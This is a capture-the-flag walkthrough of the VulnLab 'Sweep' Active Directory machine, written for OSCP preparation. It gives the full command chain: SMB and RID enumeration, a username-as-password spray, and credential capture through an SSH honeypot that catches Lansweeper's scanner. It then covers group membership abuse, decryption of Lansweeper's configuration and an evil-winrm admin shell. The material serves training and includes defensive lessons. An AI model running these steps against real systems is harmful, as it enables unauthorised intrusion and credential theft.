Sweep - VulnLab Full Walkthrough (TJnull OSCP List)
Overview
Sweep is a medium-difficulty Windows machine from VulnLab, featured on TJnull’s OSCP preparation list. This box focuses on Active Directory enumeration, Lansweeper exploitation, and creative credential harvesting techniques using SSH honeypots.
Machine Details:
- Platform: VulnLab (TJnull List)
- Difficulty: Medium
- OS: Windows Server 2022
- Domain: sweep.vl
- Machine Name: INVENTORY
- Focus Areas: Active Directory, Lansweeper, Group Manipulation
Reconnaissance
Initial Nmap Scan
Start with a comprehensive port scan to identify services:
1
nmap -sC -sV -oN sweep_nmap.txt 10.10.x.x
Key Ports Identified:
| Port | Service | Notes |
|---|---|---|
| 53 | DNS | Domain name resolution |
| 81 | HTTP | Lansweeper web interface |
| 82 | HTTP | Additional web service |
| 88 | Kerberos | Active Directory authentication |
| 389 | LDAP | Directory services |
| 3389 | RDP | Remote Desktop Protocol |
Domain Information:
- Domain:
sweep.vl - Hostname:
INVENTORY - OS: Windows Server 2022
Enumeration
SMB Enumeration with CrackMapExec
Enumerate SMB shares using guest credentials:
1
crackmapexec smb 10.10.x.x -u 'guest' -p '' --shares
Accessible Shares:
DefaultPackageShare$Lansweeper$
RID Brute-Forcing
Enumerate domain users and groups:
1
crackmapexec smb 10.10.x.x -u 'guest' -p '' --rid-brute
Findings:
- 17 domain users discovered
- Notable group: “Lansweeper Admins”
Username Enumeration
Extract usernames from RID brute-force output and create a user list:
1
2
3
4
5
# Save usernames to users.txt
intern
svc_inventory_lnx
svc_inventory_win
# ... additional users
Initial Access
Username=Password Attack
Test if any usernames work as passwords (common weak configuration):
1
2
# Test each username as its own password
crackmapexec smb 10.10.x.x -u users.txt -p users.txt --no-bruteforce
Success:
1
intern:intern - Valid credentials!
Lansweeper Web Interface Access
Access the Lansweeper application on port 81:
1
firefox http://10.10.x.x:81
Login with intern:intern credentials to gain access to the Lansweeper web interface.
Active Directory Enumeration
BloodHound Collection
Use bloodhound-python to collect AD data:
1
bloodhound-python -d sweep.vl -u intern -p intern -c all -ns 10.10.x.x
Upload JSON files to BloodHound and analyze:
1
2
3
# Start neo4j and bloodhound
sudo neo4j console
bloodhound
Key BloodHound Finding
Critical Discovery:
svc_inventory_lnxhas FullControl over “Lansweeper Admins” group- This means we can add users to the administrative group if we compromise this account
Attack Path:
- Compromise
svc_inventory_lnxaccount - Add
svc_inventory_lnxto “Lansweeper Admins” group - Leverage admin privileges for further access
Credential Harvesting
SSH Honeypot Strategy
Understanding Lansweeper: Lansweeper is an IT asset management tool that performs automated network scanning. It attempts to connect to discovered systems via various protocols including SSH to inventory Linux systems.
Attack Concept: Deploy an SSH honeypot to capture credentials when Lansweeper’s automated scanning attempts to authenticate.
Deploy sshesame
Install and run the SSH honeypot:
1
2
3
4
5
# Install sshesame
go install github.com/jaksi/sshesame@latest
# Run on port 22 (ensure no other SSH service is running)
sudo sshesame -port 22 -host 0.0.0.0
Wait for Lansweeper to scan your system…
Captured Credentials:
1
2
Username: svc_inventory_lnx
Password: [captured_password]
Privilege Escalation
Group Membership Manipulation
With svc_inventory_lnx credentials and FullControl over “Lansweeper Admins”:
1
2
3
4
# Add svc_inventory_lnx to Lansweeper Admins group
net rpc group addmem 'Lansweeper Admins' 'svc_inventory_lnx' \
-U sweep.vl/svc_inventory_lnx%[password] \
-S 10.10.x.x
Verify group membership:
1
2
3
net rpc group members 'Lansweeper Admins' \
-U sweep.vl/svc_inventory_lnx%[password] \
-S 10.10.x.x
Lansweeper Configuration Decryption
Access Lansweeper Configuration: As a member of Lansweeper Admins, we can access encrypted configuration files.
Tool: SharpLansweeperDecrypt
Download from: GitHub - SharpLansweeperDecrypt
1
2
# Decrypt web.config
.\SharpLansweeperDecrypt.exe -config "C:\Program Files\Lansweeper\Website\web.config"
Extracted Credentials:
- SQL Server credentials
- Service account passwords from encrypted database
svc_inventory_wincredentials
Final Access
Evil-WinRM Shell
Connect with discovered svc_inventory_win credentials:
1
evil-winrm -i 10.10.x.x -u svc_inventory_win -p '[password]'
Verify Privileges:
1
2
3
whoami
whoami /priv
net user svc_inventory_win /domain
Success! svc_inventory_win has administrative privileges on the domain controller.
Retrieve Flags
1
2
3
4
5
# User flag
type C:\Users\intern\Desktop\user.txt
# Root flag
type C:\Users\Administrator\Desktop\root.txt
Attack Chain Summary
graph TD
A[Nmap Scan] --> B[SMB Enumeration]
B --> C[RID Brute Force]
C --> D[Username=Password Attack]
D --> E[intern:intern Found]
E --> F[BloodHound Analysis]
F --> G[svc_inventory_lnx has FullControl]
G --> H[Deploy SSH Honeypot]
H --> I[Capture svc_inventory_lnx Creds]
I --> J[Add to Lansweeper Admins]
J --> K[Decrypt Lansweeper Config]
K --> L[Extract svc_inventory_win Creds]
L --> M[Evil-WinRM Admin Access]
Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port scanning and service enumeration |
| crackmapexec | SMB enumeration and authentication testing |
| bloodhound-python | Active Directory privilege analysis |
| sshesame | SSH honeypot for credential capture |
| net rpc (Samba) | Group membership manipulation |
| SharpLansweeperDecrypt | Decrypt Lansweeper configurations |
| evil-winrm | Windows Remote Management shell |
Key Takeaways
Security Lessons
- Weak Password Policies
- Username=password combinations are still common
- Always test for this vulnerability during assessments
- Service Account Permissions
- Service accounts with FullControl over groups can be leveraged
- Follow principle of least privilege
- Automated Scanning Risks
- Tools like Lansweeper can leak credentials to honeypots
- Implement proper credential management for scanning services
- Configuration File Security
- Encrypted configurations may contain sensitive data
- Ensure proper access controls on configuration files
OSCP Preparation Tips
- BloodHound is Critical: Master BloodHound for identifying privilege escalation paths
- Understand Service Accounts: Know how to abuse service account privileges
- Creative Thinking: SSH honeypot technique shows importance of thinking outside the box
- Tool Familiarity: Practice with CrackMapExec, BloodHound, and Evil-WinRM
Troubleshooting
SSH Honeypot Not Capturing Credentials
Problem: sshesame is running but no credentials captured
Solutions:
- Ensure port 22 is open and accessible from target network
- Stop any existing SSH services:
sudo systemctl stop ssh - Verify Lansweeper scanning is active (check web interface)
- Check firewall rules:
sudo ufw allow 22
Group Membership Changes Not Reflecting
Problem: Added user to group but changes don’t apply
Solutions:
- Wait a few minutes for AD replication
- Force group policy update on target:
1
gpupdate /force
- Verify with:
net rpc group members 'Lansweeper Admins'
Evil-WinRM Connection Fails
Problem: Cannot connect even with valid credentials
Solutions:
- Verify WinRM service is running on target
- Check if port 5985/5986 is accessible
- Try specifying SSL flag if needed:
evil-winrm -i 10.10.x.x -u user -p pass -S - Ensure credentials have remote access rights
Quick Reference Commands
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# Initial Enumeration
nmap -sC -sV -oN sweep.txt 10.10.x.x
crackmapexec smb 10.10.x.x -u 'guest' -p '' --shares
crackmapexec smb 10.10.x.x -u 'guest' -p '' --rid-brute
# Username=Password Attack
crackmapexec smb 10.10.x.x -u users.txt -p users.txt --no-bruteforce
# BloodHound Collection
bloodhound-python -d sweep.vl -u intern -p intern -c all -ns 10.10.x.x
# SSH Honeypot
sudo sshesame -port 22 -host 0.0.0.0
# Group Manipulation
net rpc group addmem 'Lansweeper Admins' 'svc_inventory_lnx' \
-U sweep.vl/svc_inventory_lnx%PASSWORD -S 10.10.x.x
# Final Access
evil-winrm -i 10.10.x.x -u svc_inventory_win -p 'PASSWORD'
